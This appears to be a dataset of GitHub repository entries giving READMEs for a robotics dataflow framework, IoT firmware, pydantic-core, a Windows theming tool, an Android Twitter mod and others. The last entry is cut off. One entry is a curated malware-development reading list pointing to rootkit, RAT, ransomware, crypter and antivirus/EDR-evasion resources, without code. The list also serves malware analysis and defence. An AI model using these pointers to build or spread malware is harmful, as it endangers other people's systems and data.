dora-rs/dora;Website | Python API - Rust API | Guide | Discord What is dora-rs? Dataflow-oriented robotic application (dora-rs) is a framework that makes creation of robotic applications fast and simple. Building a robotic application can be summed up as bringing together hardwares, algorithms, and AI models, and make them communicate with each others. At dora-rs, we try to: make integration of hardware and software easy by supporting Python, C, C++, and also ROS2. make communication low latency by using zero-copy Arrow messages. dora-rs is still experimental and you might experience bugs, but we're working very hard to make it stable as possible. Performance dora-rs can show impressive performance, up to 17x faster compared to current status quo ROS2 in Python! This is the result of using our own shared memory server and Apache Arrow to achieve zero copy data passing. See: https://github.com/dora-rs/dora-benchmark/tree/main for reproduction. Dataflow Paradigm dora-rs implements a declarative dataflow paradigm where tasks are split between nodes isolated as individual processes. Each node defines its inputs and outputs to connect with other nodes. ```yaml nodes: - id: webcam custom: source: webcam.py inputs: tick: dora/timer/millis/50 outputs: - image id: object_detection custom: source: object_detection.py inputs: image: webcam/image outputs: - bbox id: plot custom: source: plot.py inputs: image: webcam/image bbox: object_detection/bbox ``` Nodes can either be: custom nodes were dora-rs is embedded as a native libraries. runtime nodes were dora-rs takes care of the main loop and run user-defined operators. This make dora-rs featureful as we can run features like hot-reloading . The dataflow paradigm has the advantage of creating an abstraction layer that makes robotic applications modular and easily configurable. Communication Communication between nodes is handled with shared memory on a same machine and TCP on distributed machines. Our shared memory implementation tracks messages across processes and discards them when obsolete. Shared memory slots are cached to avoid new memory allocation. Message Format Nodes communicate with Apache Arrow Data Format. Apache Arrow is a universal memory format for flat and hierarchical data. The Arrow memory format supports zero-copy reads for lightning-fast data access without serialization overhead. It defines a C data interface without any build-time or link-time dependency requirement, that means that dora-rs has no compilation step beyond the native compiler of your favourite language. Opentelemetry dora-rs uses Opentelemetry to record all your logs, metrics and traces. This means that the data and telemetry can be linked using a shared abstraction. Opentelemetry is an open source observability standard that makes dora-rs telemetry collectable by most backend such as elasticseach, prometheus, Datadog.. Opentelemetry is language independent, backend agnostic, and easily collect distributed data, making it perfect for dora-rs applications. Hot-Reloading dora-rs implements Hot-Reloading for python which means you can change code at runtime in Python while keeping your state intact. Using the feature flag: --attach --hot-reload , dora-rs watch for code change and reload nodes that has been modified. You can check fail-safe mechanism at: https://github.com/dora-rs/dora/pull/239 Self-Coding Robot: Code RAG (WIP) You can easily create a self-coding robot, by combining Hot-reloading with a Retrieval Augmented Generation (RAG) that is going to generate code modification from your prompt. See: examples/python-operator-dataflow Self-Coding Robot is just the tip of the iceberg of robotics combined with llm, that we hope to power. There is so much more that we haven't explored yet like: self-debugging memory function calling ... Installation Quickest way: ```bash cargo install dora-cli --locked pip install dora-rs # For Python API dora --help ``` For more info on installation, check out our guide . Getting Started Install the example python dependencies: bash pip install -r https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/requirements.txt Get some example operators: bash wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/webcam.py wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/plot.py wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/utils.py wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/object_detection.py wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/dataflow.yml Start the dataflow bash dora up dora start dataflow.yml --attach --hot-reload Make sure to have a webcam To stop your dataflow, you can use ctrl + c To go further, you can add a yolov8 operator, check out our getting started here: https://www.dora-rs.ai/docs/guides/getting-started/yolov8/ ROS2 Bridge Compilation Free Message passing to ROS 2 Automatic conversion ROS 2 Message <-> Arrow Array ```python import random import pyarrow as pa Configuration Boilerplate... turtle_twist_writer = ... Arrow Based ROS2 Twist Message which does not requires ROS2 import message = pa.array([{ "linear": { "x": 1, }, "angular": { "z": 1 }, }]) turtle_twist_writer.publish(message) ``` You might want to use ChatGPT to write the Arrow Formatting: https://chat.openai.com/share/4eec1c6d-dbd2-46dc-b6cd-310d2895ba15 Hardwares Cool hardware that we think might be good fit to try out dora-rs 🙋 We are not sponsored by manufacturers: | | Price | Open Source | Github | type | Dora Project | | --------------------------------- | ----- | ------------------ | ---------------------------------------------------- | ---------- | ------------------------------------------------------- | | DJI Robomaster S1 | 550$ | SDK | https://github.com/dji-sdk/RoboMaster-SDK | Rover | https://huggingface.co/datasets/dora-rs/dora-robomaster | | DJI Robomaster EP Core | 950$ | SDK | https://github.com/dji-sdk/RoboMaster-SDK | Rover, Arm | | | DJI Tello | 100$ | | | Drone | | | BitCraze Crazyflies | 225$ | Firmware, Lib, SDK | https://github.com/bitcraze | Drone | | | AlexanderKoch-Koch/low_cost_robot | 250$ | Everything | https://github.com/AlexanderKoch-Koch/low_cost_robot | Arm | | | xArm 1S | 200$ | | | Arm | | | Wavego | 250$ | | | Quadruplet | | | AINex | 800$ | | | Humanoid | | For more: https://docs.google.com/spreadsheets/d/1YYeW2jfOIWDVgdEgqnMvltonHquQ7K8OZCrnJRELL6o/edit#gid=0 Documentation The full documentation is available on our website Discussions Our main communication channels are: Our Discord server Our Github Project Discussion Feel free to reach out on any topic, issues or ideas. We also have a contributing guide . Support Matrix | | dora-rs | Hoped for | | --------------------------------- | --------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------- | | Tier 1 Support | Python, Rust | C, C++, ROS 2 | | Tier 2 Support | C, C++, ROS2 | | Hot-reloading | Python | Rust (https://github.com/orgs/dora-rs/discussions/360) | | Message Format | Arrow | Native | | Local Communication | Shared Memory | Custom Middleware, zero-copy GPU IPC , intra-process tokio::channel communication | | Remote Communication | TCP (See: https://github.com/dora-rs/dora/issues/459) | Custom Middleware, Zenoh | | Metrics, Tracing, and Logging | Opentelemetry | Native logging libraries into Opentelemetry | | Data archives | Parquet ( dora-record ) | | Visualization and annotation | OpenCV | rerun.io | | Supported Platforms (x86) | Windows, macOS, Linux | | Supported Platforms (ARM) | macOS, Linux | | Configuration | YAML | Unstable functionality dora-rs Ros2 Bridge is marked as unstable . There are a number of reasons functionality may be marked as unstable: We are unsure about the exact API. The name, function signature, or implementation are likely to change in the future. The functionality is not tested extensively yet. Bugs may pop up when used in real-world scenarios. The functionality does not integrate well with the full dora-rs API. You may find it works in one context but not in another. Releasing functionality as unstable allows us to gather important feedback from users that use dora-rs in real-world scenarios. This helps us fine-tune things before giving it the final stamp of approval. Users are only interested in solid, well-tested functionality can avoid this part of the API. Functionality marked as unstable may change at any point without it being considered a breaking change. License This project is licensed under Apache-2.0. Check out NOTICE.md for more information.;DORA (Dataflow-Oriented Robotic Application) is middleware designed to streamline and simplify the creation of AI-based robotic applications. It offers low latency, composable, and distributed dataflow capabilities. Applications are modeled as directed graphs, also referred to as pipelines.;dataflow,low-latency,robotics,rust,embodied-ai
dora-rs/dora
openshwprojects/OpenBK7231T_App;Introduction OpenBK7231T/OpenBeken is a Tasmota/Esphome replacement for new Tuya modules featuring MQTT and Home Assistant compatibility. This repository is named "OpenBK7231T_App", but now it's a multiplatform app, supporting build for multiple separate chips: - BK7231T ( WB3S , WB2S , WB2L, etc) - BK7231N ( CB2S , CB2L , WB2L_M1 , etc) - BK7231M , this is a non-Tuya version of BK7231N with 00000000 keys, also sometimes in BL2028 flavour - T34 ( T34 is based on BK7231N ), see flashing trick - BL2028N ( BL2028N is a Belon version of BK7231N ) - XR809 ( XR3 , etc) - BL602 ( SM-028_V1.3 etc ), see also BL602 flash OBK via OTA tutorial - LF686 (flash it as BL602 ) - W800 (W800-C400, WinnerMicro WiFi & Bluetooth), W801 - W600 (WinnerMicro chip), W601 ( WIS600, ESP-01W , TW-02 , TW-03 , etc) - LN882H by Lightning Semi - datasheet , see flashing how-to , see sample device teardown and flashing , see new flash tool , see dev board - Windows, via simulator Please use automatically compiled binaries from the Releases tab. To build yourself for a given platform, just checkout first our version of SDK and then checkout this app repository into it, details later. See our guides in Russian: BK7231N/T34 , and BL602 RGB , and Youtube guide for BK7231/T34 If you want to get some generic information about BK7231 modules, available datasheets, pinout, peripherals, consult our docs topic . Supported Devices/Templates List Now with 500+ entries! (Get 🏆 free SD Card 🏆 for submitting new one!) We have our own interactive devices database that is maintained by users. The database is also accessible from inside our firmware (but requires internet connection to fetch). Have a not listed device? HELP US, submit a teardown here and 🏆 get free SD card and gadgets set 🏆 ! Thanks to cooperation with Elektroda.com , if you submit a detailed teardown/article/review, we can send you this set of gadgets for free (🚚shipping with normal letter🚚). NOTE: Obviously almost any device with supported chip (BK7231, BL602, W600, etc is potentially supported and it's not possible to list all available devices in the market, so feel free to try even if your device is not listed - we are here to help and guide you step by step !) Our Youtube Channel (See step by step guides for flashing and setup) We have our own Youtube channel with OBK-related guides. Please see our playlists: - flashing guides playlist - generic setup hints, tricks, tips You can help us by giving like, a comment and subscribe! Features OpenBeken features: - Tasmota-like setup, configuration and experience on all supported platforms (supports common Tasmota JSON over http and MQTT, etc) - OTA firmware upgrade system (for BK, W*00, BL602, LN); to use OTA, drag and drop proper OTA file on OTA field on new Web App Javascript Console - Online builds for all platforms via Github, configurable per-user build system , also supports Docker builds - MQTT compatibility with Home Assistant (with both Yaml generator and HA Discovery ) - Support for multiple relays, buttons, leds, inputs and PWMs, everything fully scriptable - Driver system for custom peripherals, including TuyaMCU (see Dimmer tutorial ), I2C bus and BL0942 , BL0937 power metering chips, Motor Driver Bridge. - Hardware and software I2C, supports multiple I2C devices, like TC74 temperature sensor, MCP23017 port expander, PCF8574T LCD 2x16 (or other?), etc - Hardware and software SPI, support for SPI BL0942, etc - NTP time from network (can be used with TH06 and other TuyaMCU devices), can run any script on selected weekday hour:minute:second - Dedicated TuyaMCU support with extra TuyaMCU analyzer tool for decoding new devices ( tutorial here , code repository here ) - support for TuyaMCU Battery Powered devices protocol (TuyaMCU enables WiFi module only to report the state, eg. for door sensors, water sensors) - RGBCW LED lighting control compatible with Home Assistant (including PWM LEDs, and SM2135, BP5758, SM15155 etc ) - LittleFS integration for scripts and large files (you can write scripts there , you can host a page there with REST interface control of device) - Command line system for starting and configuring drivers, for controlling channels, etc - Short startup command (up to 512 characters) storage in flash config, so you can easily init your drivers (eg. BL0942) without LittleFS - Advanced scripting and events system (allows you to mirror Tasmota rules, for example catch button click, double click, hold) - Easily configurable via commands (see tutorial ) - Thanks to keeping Tasmota standard, OBK has basic compatibility with ioBroker and similar systems through TELE/STAT/CMND MQTT packets, Tasmota Control app is also supported - DDP lighting protocol support ("startDriver DDP" in autoexec.bat/short startup command), works with xLights, - Can be scripted to even work with shutters , see also second shutters script - Password-protected Web security see tutorial - Advanced deep sleep with GPIO/timer wakeup and hybrid power save systems , fully scriptable, can be configured to last longer than Tuya - Supports automatic GPIO setup with Tuya GPIO extraction , cloudcutter templates , can also import/export OpenBeken templates , you can also use GPIODoctor to find out quickly GPIO roles - Advanced and custom drivers like synchronized PWM groups with configurable dead time - WS2812B support, see scripting tutorial - LFS and REST API allows you to create and host a custom HTML+CSS+JS page on device with a custom GUI/display of channels/TuyaMCU dpIDs, see tutorial and see sample page , and see final version of custom TOMPD-63-WIFI page - can control 'smart lab organiser drawers' with a custom Drawers driver, see full presentation - Can run on Windows with device simulator/schematic drawer, see tutorial - and much more There is also a bit more outdated WIKI Building OpenBeken supports online builds for all platforms (BK7231T, BK7231N, XR809, BL602, W800), but if you want to compile it yourself, see BUILDING.md Developer guides online builds system guide how to create custom obk driver how to analyze unknown protocol with Salae logic analyzer obk simulator short presentation Flashing See our GUI easy flash tool , also see FLASHING.md Docs - MQTT topics, Console Commands, Flags, Constants, Pin Roles, Channel Types, FAQ, autoexec.bat examples Further reading For technical insights and generic SDK information related to Beken, WinnerMicro, Bouffallo Lab and XRadio modules, please refer: https://www.elektroda.com/rtvforum/topic3850712.html https://www.elektroda.com/rtvforum/topic3866123.html https://www.elektroda.com/rtvforum/topic3806769.html Support project If you want to support project, please donate at: https://www.paypal.com/paypalme/openshwprojects Special thanks for Tasmota/Esphome/etc contributors for making a great reference for implementing Tuya module drivers;Open source firmware (Tasmota/Esphome replacement) for BK7231T, BK7231N, BL2028N, T34, XR809, W800/W801, W600/W601 and BL602;wifi,iot,mqtt,smart-home,tuya,tasmota,bk7231,bk7231n,bk7231t,bl602
openshwprojects/OpenBK7231T_App
rootkit-io/awesome-malware-development;Introduction This Repo serves as a list of resources for malware development. Note: I am just a learner what i have im sharing some reources can be stupid, you can help me adding things. Essentials I would say having some experience with C and assembly going to be good. some resources for C and assmebly. C for Everyone: Programming Fundamentals learn-c C cheatsheet Architecture 1001: x86-64 Assembly x86 Assembly Blogs Vitali Kremez blog Lot's of Malware related content. 0xPat blog Have an amazing malware development series i would recommend to take a look. zerosum0x0 blog Some good posts. Guitmz blog Dope Maldev Content. TheXcellerator Amazing LKM rookit series and maldev posts. Talks Horse Pill: A New Type of Linux Rootkit \ Not a talk but good LKM rootkit series \ Good talk on Creating and Countering the Next Generation of Linux Rootkits \ Kernel Mode Threats and Practical Defenses \ Alex Ionescu - Advancing the State of UEFI Bootkits \ BlueHat v18 || Return of the kernel rootkit malware (on windows 10) Youtube channels AGDC Services HQ Malware Content. TheSphinx Have an amazing series on Writing your Rat from Scratch. Joey Abrams Amazing Malware stuff, have a good code injection series, Linux stuff. w3w3w3 Have a good LKM rootkit series. Courses There are some courses I would love to recommend. RED TEAM Operator: Malware Development Essentials course | Sektor7 This course will teach you how to become a better ethical hacker, pentester and red teamer by learning malware development. It covers developing droppers, trojans and payload/DLL injectors using some basic C and Intel assembly skills. RED TEAM Operator: Malware Development Intermediate course Advanced malware development techniques in Windows, including: API hooking, 32-/64-bit migrations, reflective binaries and more. RingZerø: Windows Kernel Rootkits: Techniques and Analysis Key Learnings: - Machine architecture for kernel programmers - Virtual memory management - Interrupts and exceptions - CPU security features - Windows kernel architecture - Kernel components (Ps, Io, Mm, Ob, Se, Cm, etc.) - System mechanisms - Debugging with WinDbg - Rootkit techniques - Driver development CodeMachine: Windows Kernel Rootkits Topics: - Kernel Attacks - Kernel Shellcoding - Kernel Hooking and Injection - Kernel Callbacks - Kernel Filtering - Kernel Networking - Virtualization Based Security Books The Art of Computer Virus Research and Defense The Giant Black Book of Computer Viruses Designing BSD Rootkits: An Introduction to Kernel Hacking Rootkits and Bootkits The Antivirus Hackers' Handbook Free books Make your own first fud crypter Articles/posts Malware Development – Welcome to the Dark Side: Part 1 \ Art of Malware \ Malware Development Part 1 \ Basic Ransomware guide \ Understanding TRITON and the Missing Final Stage of the Attack good read. \ Master of RATs - How to create your own Tracker \ Amazing article to read with some good resources (Personal Tale and the Road to Malware Development, Resources) \ PT_NOTE -> PT_LOAD x64 ELF virus written in Assembly \ The magic of LD_PRELOAD for Userland Rootkits(good read if you wanna get into rootkits this blog is for userland rootkits) \ (Recommended Read) if you want to creat your first userland rootkit and you just know C you can go for this blog if you wanna start into rootkit development \ Function Hooking Part I: Hooking Shared Library Function Calls in Linux \ Inline Hooking for Programmers (Part 1: Introduction) \ Inline Hooking for Programmers (Part 2: Writing a Hooking Engine) \ PE injection for beginners \ Becoming-rat-your-system \ Complete guide on LKM hacking \ Best series i will say if you wanna get into programming/malware dev recommended series to follow it will start with learn programming thats needed asm and stuff after that getting into maldev \ Filess malware \ Examining the Morris Worm Source Code \ IOT Malware \ DoublePulsar SMB backdoor analysis \ Eset Turla Outlook backdoor report \ Writing a custom encoder \ Engineering antivirus evasion \ Analysis of Project Sauron APT \ WastedLocker analysis \ Lazarus shellcode execution \ Detailed analysis of Zloader \ BendyBear shellcode malware \ A Basic Windows DKOM Rootkit \ Loading Kernel Shellcode \ Windows Kernel Shellcode on Windows 10 – Part 1 \ Windows Kernel Shellcode on Windows 10 – Part 2 \ Windows Kernel Shellcode on Windows 10 – Part 3 \ Introduction to Shellcode Development \ Autochk Rootkit Analysis \ pierogi backdoor \ Pay2Kitten \ STEELCORGI \ Lebanese Cedar APT \ LazyScripter \ Maze deobfuscation \ Darkside overview \ SunBurst backdoor - FireEye analysis \ Code obfuscation techniques \ SideCopy APT tooling \ Hiding in PEB sight: Custom loader \ Zloader: New infection technique \ FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines \ A tale of EDR bypass methods \ In-depth dive into the security features of the Intel/Windows platform secure boot process \ Process Injection Techniques \ Adventures with KernelCallbackTable Injection \ Useful Libraries for Malware Development \ Parent Process ID (PPID) Spoofing \ Mutants Sessions Self Deletion \ OffensiVe Security with V - Process Hollowing \ Looking for Remote Code Execution bugs in the Linux kernel \ memory-analysis-evasion \ 100% evasion - Write a crypter in any language to bypass AV Forums https://0x00sec.org/ One of the best Malware Development fourms that helped me a lot. Sample Sharing Underground MalShare Malware Bazaar Some interesting Github Repos(miscellaneous) TL-TROJAN A collection of source code for various RATs, Stealers, and other Trojans. Linker_preloading_virus An example of hijacking the dynamic linker with a custom interpreter who loads and executes modular viruses. Awesome-linux-rootkits A summary of linux rootkits published on GitHub. Virii Collection of ancient computer virus source codes. Flare-floss FLARE Obfuscated String Solver - Automatically extract obfuscated strings from malware. Ebpfkit Ebpfkit is a rootkit powered by eBPF. Al-Khaser Public malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection. Evasions Evasions encyclopedia gathers methods used by malware to evade detection when run in virtualized environment. loonix_syscall_hook System call hooking on arm64 linux via a variety of methods. awesome-executable-packing A curated list of awesome resources related to executable packing.;Organized list of my malware development resources;malware,malware-development,malware-research
rootkit-io/awesome-malware-development
pydantic/pydantic-core;pydantic-core This package provides the core functionality for pydantic validation and serialization. Pydantic-core is currently around 17x faster than pydantic V1. See tests/benchmarks/ for details. Example of direct usage NOTE: You should not need to use pydantic-core directly; instead, use pydantic, which in turn uses pydantic-core. ```py from pydantic_core import SchemaValidator, ValidationError v = SchemaValidator( { 'type': 'typed-dict', 'fields': { 'name': { 'type': 'typed-dict-field', 'schema': { 'type': 'str', }, }, 'age': { 'type': 'typed-dict-field', 'schema': { 'type': 'int', 'ge': 18, }, }, 'is_developer': { 'type': 'typed-dict-field', 'schema': { 'type': 'default', 'schema': {'type': 'bool'}, 'default': True, }, }, }, } ) r1 = v.validate_python({'name': 'Samuel', 'age': 35}) assert r1 == {'name': 'Samuel', 'age': 35, 'is_developer': True} pydantic-core can also validate JSON directly r2 = v.validate_json('{"name": "Samuel", "age": 35}') assert r1 == r2 try: v.validate_python({'name': 'Samuel', 'age': 11}) except ValidationError as e: print(e) """ 1 validation error for model age Input should be greater than or equal to 18 [type=greater_than_equal, context={ge: 18}, input_value=11, input_type=int] """ ``` Getting Started You'll need rust stable installed , or rust nightly if you want to generate accurate coverage. With rust and python 3.8+ installed, compiling pydantic-core should be possible with roughly the following: ```bash clone this repo or your fork git clone git@github.com:pydantic/pydantic-core.git cd pydantic-core create a new virtual env python3 -m venv env source env/bin/activate install dependencies and install pydantic-core make install ``` That should be it, the example shown above should now run. You might find it useful to look at python/pydantic_core/_pydantic_core.pyi and python/pydantic_core/core_schema.py for more information on the python API, beyond that, tests/ provide a large number of examples of usage. If you want to contribute to pydantic-core, you'll want to use some other make commands: * make build-dev to build the package during development * make build-prod to perform an optimised build for benchmarking * make test to run the tests * make testcov to run the tests and generate a coverage report * make lint to run the linter * make format to format python and rust code * make to run format build-dev lint test Profiling It's possible to profile the code using the flamegraph utility from flamegraph-rs . (Tested on Linux.) You can install this with cargo install flamegraph . Run make build-profiling to install a release build with debugging symbols included (needed for profiling). Once that is built, you can profile pytest benchmarks with (e.g.): bash flamegraph -- pytest tests/benchmarks/test_micro_benchmarks.py -k test_list_of_ints_core_py --benchmark-enable The flamegraph command will produce an interactive SVG at flamegraph.svg . Releasing Bump package version locally. Do not just edit Cargo.toml on Github, you need both Cargo.toml and Cargo.lock to be updated. Make a PR for the version bump and merge it. Go to https://github.com/pydantic/pydantic-core/releases and click "Draft a new release" In the "Choose a tag" dropdown enter the new tag v<the.new.version> and select "Create new tag on publish" when the option appears. Enter the release title in the form "v " Click Generate release notes button Click Publish release Go to https://github.com/pydantic/pydantic-core/actions and ensure that all build for release are done successfully. Go to https://pypi.org/project/pydantic-core/ and ensure that the latest release is published. Done 🎉;Core validation logic for pydantic written in rust;json-schema,parsing,pydantic,rust,schema,validation
pydantic/pydantic-core
Abdelrhman-AK/WinPaletter;🛑 Announcement: Project Development Discontinuation: Dear WinPaletter Users, It is with a heavy heart that I announce the discontinuation of further development on the WinPaletter project. While there's an extremely slim possibility that I may find time in the distant future, perhaps years from now, to resume maintenance, I must inform you that version 1.0.9.3 marks the end of active development. Subsequent versions ( 1.0.9.x ) has extremely weak possibility to be developed. In the coming days or weeks, I will proceed to archive this repository. However, please note that the existing version will remain accessible for continued use, albeit without updates or maintenance. You can certainly contribute to the WinPaletter Store for themes; this repository won't be archived. Open the Wiki and navigate to the WinPaletter Store section in the side panel. I want to express my deepest gratitude for your support and for choosing WinPaletter. Your enthusiasm and feedback have been invaluable throughout this journey. It has been an immense honor for me to contribute to a project that aimed to enhance your user experience. If WinPaletter has caused any inconvenience or disruption to your Windows setup, I sincerely apologize. WinPaletter WinPaletter is a portable tool designed to elevate your Windows desktop experience. Whether you're a designer, developer, or someone who loves personalization, WinPaletter offers an intuitive interface and robust features to streamline the management and application of colors and effects on your Windows system. With WinPaletter, you can customize a wide range of Windows aspects, including Windows Colors, Visual Styles, Classic Colors, Lock screen (LogonUI), Cursors, Metrics and Fonts, Terminals and Consoles, wallpaper, sounds, screen savers, Windows effects (tweaks), and Windows icons according to your preferences. Key Features Intuitive Interface: WinPaletter boasts a user-friendly interface, making color palette management accessible to users of all levels of expertise. Themes Import/Export: Explore a world of creativity with the ability to import and export themes. Visit the WinPaletter Store to discover a diverse collection of themes shared by the community. Real-time Preview: Witness your color choices come to life with the real-time preview feature, allowing you to fine-tune your color scheme effortlessly. Getting Started Requirements: | Windows | WinPaletter ... and higher | Frameworks | | ------------------ | ------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | 11, 10 | Any version | You might need to update .NET framework in outdated Windows 10 or build less than 1709 | | 8.1, 7 | 1.0.5.0 | .NET Framework 4.7.2, or 4.8 | | 8 | Not supported :x: | Not supported as .NET framework 4.7.2 or 4.8 can't be installed at all | | Vista | 1.0.7.1 | .NET Framework 4.8 Repacked. Read Windows Vista's documentation | | XP | 1.0.7.1 | OneCoreAPI + .NET Framework 4.8 Repacked. You must read its documentation | Download: You can download the latest release from the releases page . > Note: It is the first source to be updated. Alternatively, you can use: Microsoft WinGet: winget install Abdelrhman-AK.WinPaletter -l "UnzipPath" Chocolatey: choco install WinPaletter or choco install WinPaletter --version x.x.xx Visit this for advanced instructions. Launch: Once downloaded, launch WinPaletter and start exploring its features to enhance your desktop aesthetics. Wiki (Help) Click here to learn more about WinPaletter. Changelog Click here to view all changes that have been made to WinPaletter since its initial release. Support me PayPal Languages Click here to get languages for WinPaletter. Do you have an antivirus or browser issue? Click here to read instructions . Credits WinPaletter is developed and maintained by Abdelrhman-AK and the incredible open-source community: Modifying Modern Windows Elements Inspired by u/aveyo and u/Egg-Tricky on Reddit: Link 1 , Link 2 Patching UxTheme.dll to apply unsigned Visual Styles by SecureUxTheme, developed by namazso 3D and flat degrees modification in 3D objects (Classic Colors) is inspired by Desktop Architect Colors picking controls by Cyotek Image to palette conversion mechanism by ColorThief, developed by KSemenenko Bitmap effects powered by ImageProcessor Bitmaps to cursors conversion mechanism developed by Evan Olds Retrieving elements of Windows XP visual styles (*.msstyles) using the Advanced UxTheme wrapper Extracting elements from visual styles (*.msstyles) using nptr/msstyleEditor Patching PE files by Ressy, developed by Tyrrrz Handling JSON files using Newtonsoft JSON by James Newton-King Processing and handling command lines arguments by CommandLineParser Icons designed by Pichon Animation and transition effects for controls by FluentTransitions, developed by Andreas Wäscher Animation for Controls by Pavel Torgashov Modern dialogs design (messages boxes) by Ookii.Dialogs.WinForms Using JetBrainsMono as a monospaced font for WinPaletter These items are provided by Microsoft: Classic color schemes, Luna theme preview (Luna.msstyles) and Command Prompt and PowerShell raster fonts previews License WinPaletter is licensed under the MIT/LGPL Dual License . Feel free to use, modify, and distribute it in accordance with the terms of the license.;Advanced Windows Appearance Editor;windows10,windows11,theme,windows7,windows8-1,cursors,logonui,windows-classic,command-prompt,powershell
Abdelrhman-AK/WinPaletter
Dr-TSNG/TwiFucker;TwiFucker ### Yet Another Adkiller for Twitter [![author][author-image]][author-url] [![release][release-image]][release-url] [![last commit][last-commit-image]][last-commit-url] English   |   [Indonesia](README_IN.md)   |   [日本語](README_JA.md) ## ⚠️ This is an Xposed module. Support only API 93+ ⚠️ You can find Beta version / Rootless integration (automatically embed latest Twitter with [LSPatch](https://github.com/LSPosed/LSPatch)) at our Telegram channel [author-image]: https://img.shields.io/badge/author-Nullptr-blue.svg [author-url]: https://github.com/Dr-TSNG [release-image]: https://img.shields.io/github/v/release/Dr-TSNG/TwiFucker?color=blue [release-url]: https://github.com/Dr-TSNG/TwiFucker/releases/latest [last-commit-image]: https://img.shields.io/github/last-commit/Dr-TSNG/TwiFucker?label=last%20commit [last-commit-url]: https://github.com/Dr-TSNG/TwiFucker/commits 🚫 This project is currently discontinued due to shameless plagiarism ⚠️ Copyright Notice What we hate most about is the modification of our texts, especially our MODULE TITLE , which absolutely means they want others to think all the work is done by THEM instead of others, though they actually helped NOTHING with the module development. We are not opposed to integrating our module in your client, but we strongly condemn the behavior of modifying our texts and hiding our author info . Although our project was open source before, we didn't set up a license, so ALL COPYRIGHTS RESERVED . And from now on we decline ANY modification or pre-patched client. It's ok if you LSPatch Twitter with our module by yourself, but you should not release your patched apk anywhere. ✨ Features ## Remove promoted content ## Remove promoted users ## Remove promoted trends ## Remove sensitive media warning ## Disable recommended users ## Copyable alt text ## Download media menu ## Hide drawer items Slightly broken due to Twitter new drawer layout. ## Hide navigation bar items ## Disable url redirect Prevent Twitter redirect from `t.co` to target link when clicking on a link in Twitter. ## Disable Threads (live content) ## Disable Tweet Detail Related Tweets ## Remove video carousel ## Feature switch Force enable/disable Twitter experimental feature. ## Disable banner view 🛠️ Usage Long tap Twitter logo at top of the Twitter home screen OR Settings and privacy > Additional resources > Tap version 🚀 Stargazers over time;Yet Another Adkiller for Twitter;android,twitter,xposed
Dr-TSNG/TwiFucker
AngusJohnson/Clipper2;Clipper2 A Polygon Clipping and Offsetting library (in C++, C# & Delphi) The Clipper2 library performs intersection , union , difference and XOR boolean operations on both simple and complex polygons. It also performs polygon offsetting. This is a major update of my original Clipper library that was written over 10 years ago. That library I'm now calling Clipper1 , and while it still works very well, Clipper2 is better in just about every way. Compilers Clipper2 can be compiled using either C++, or C#, or Delphi Pascal. The library can also be accessed from other programming languages by dynamically linking to exported functions in the C++ compiled Clipper2 library . (Since the C++ compiled code is measurably faster, C# and Delphi developers may also prefer this approach in applications where the library's performance is critical.) | Lang. | Requirements | | --- | --- | | C++: | Requires C++17 (could be modified to C++11 with relatively minor changes), or | | C#: | The library uses Standard Library 2.0 but the sample code uses .NET6, or | | Delphi: | Compiles with any version of Delphi from version 7 to current.| Documentation Extensive HTML documentation Examples //C++ Paths64 subject, clip, solution; subject.push_back(MakePath({100, 50, 10, 79, 65, 2, 65, 98, 10, 21})); clip.push_back(MakePath({98, 63, 4, 68, 77, 8, 52, 100, 19, 12})); solution = Intersect(subject, clip, FillRule::NonZero); //C# Paths64 subj = new Paths64(); Paths64 clip = new Paths64(); subj.Add(Clipper.MakePath(new int[] { 100, 50, 10, 79, 65, 2, 65, 98, 10, 21 })); clip.Add(Clipper.MakePath(new int[] { 98, 63, 4, 68, 77, 8, 52, 100, 19, 12 })); Paths64 solution = Clipper.Intersect(subj, clip, FillRule.NonZero); //Delphi var subject, clip, solution: TPaths64; begin SetLength(subject, 1); subject[0] := MakePath([100, 50, 10, 79, 65, 2, 65, 98, 10, 21]); SetLength(clip, 1); clip[0] := MakePath([98, 63, 4, 68, 77, 8, 52, 100, 19, 12]); solution := Intersect( subject, clip, frNonZero); Ports to other languages | lang. | link | | ------ | ------ | | WASM | https://github.com/ErikSom/Clipper2-WASM/ | | Java | https://github.com/micycle1/Clipper2-java/ | | Kotlin | https://github.com/Monkey-Maestro/clipper2-kotlin | | golang | https://github.com/epit3d/goclipper2 |;Polygon Clipping and Offsetting - C++, C# and Delphi;cpp,csharp,delphi,geometry,pascal,polygon-intersection,polygon-union,offsetting,polygon,polygon-boolean
AngusJohnson/Clipper2
deltazefiro/Amarok-Hider;Amarok-Hider 🌐 ENGLISH | 简体中文 What is Amarok? Amarok is an Android application which enables you to hide your private files & apps with a single click. Often, we resort to complex encryptors to secure our files and apps, aiming to shield them from prying eyes. These encryptors, while effective, tend to be slow and resource-intensive, making the encryption of large files such as videos and music a daunting task. Despite their robust security, these methods are often overkill for the average user who simply wish to keep their private files and apps out of unintentional reach. Amarok is designed to be a light-weight hider for files and applications: - It disguises file names and headers, causing them to seem "corrupted" and unopenable. - Amarok deactivates applications, rendering them invisible in the launcher and system menu. Features User-Friendly : Easily hide files and applications with a single click. Rapid and Efficient Large File Hiding : Hides by altering only file name and signature, unaffected by file size. Root-Free Application Hiding : Makes apps vanish from the launcher. Compatible with Root, Shizuku, Dhizuku, and DSM modes. Panic button : Use a floating button to quickly hide applications and files in urgent scenarios. Quick Settings Tile : A control center toggle for immediate hiding, bypassing the need to launch the app. App Lock : Secure Amarok access with a password or fingerprint. Pleasant Interface : Clean and attractive Material3 design. [!IMPORTANT] Please aware that Amarok is not an encryption software, but rather a tool for hiding things. We strongly advise against using Amarok to protect confidential files and applications. Screenshots Download (FOSS) (FOSS) (Pre-release channel) Usage Contributing Thank you for dedicating your time in contributing to this project! Contributions in all forms are welcomed, including reporting bugs, proposing new features, performing language translations, and submitting code development PRs. We use weblate for translations. Credits Many thanks to: aistra0528/Hail , for providing 